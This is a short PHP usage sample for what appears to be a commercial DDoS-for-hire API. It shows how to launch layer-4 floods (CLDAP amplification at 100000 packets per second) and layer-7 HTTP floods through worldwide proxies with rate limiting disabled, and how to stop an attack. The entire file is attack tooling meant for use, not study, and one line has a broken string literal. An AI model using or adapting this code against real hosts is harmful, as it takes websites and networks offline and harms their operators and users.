Sample API usage of
PHP version 5.x (+).
Libcurl package.
Available here :
require 'API.php';
// UserID and API Key generated from API Manager website.
$userID = 123456789;
$apiKey = "ABCD-123";
$api = new API($userID, $apiKey);
$host = "";
$port = "80;
$time = 15;
$method = "CLDAP";
$slots = 1;
$pps = 100000;
/* Parameters : IPv4 , Port , Time , Method , Slots, PPS */
$response = $api->startL4($host, $port, $time, $method, $slots, $pps);
$host = "";
$time = "15";
$method = "JSDOM";
$slots = 1;
$origin = "Worldwide";
$requesttype = "GET";
$ratelimit = "false";
/* Parameters : URL , Time , Method , Slots , Type, Origin Proxy, Ratelimit (true = enable, false = disabled) */
$response = $api->startL7($host, $time, $method, $slots, $requesttype, $origin, $ratelimit);
/* Parameters : Host. */
$response = $api->stopAttack("");
echo $response; // Get API response.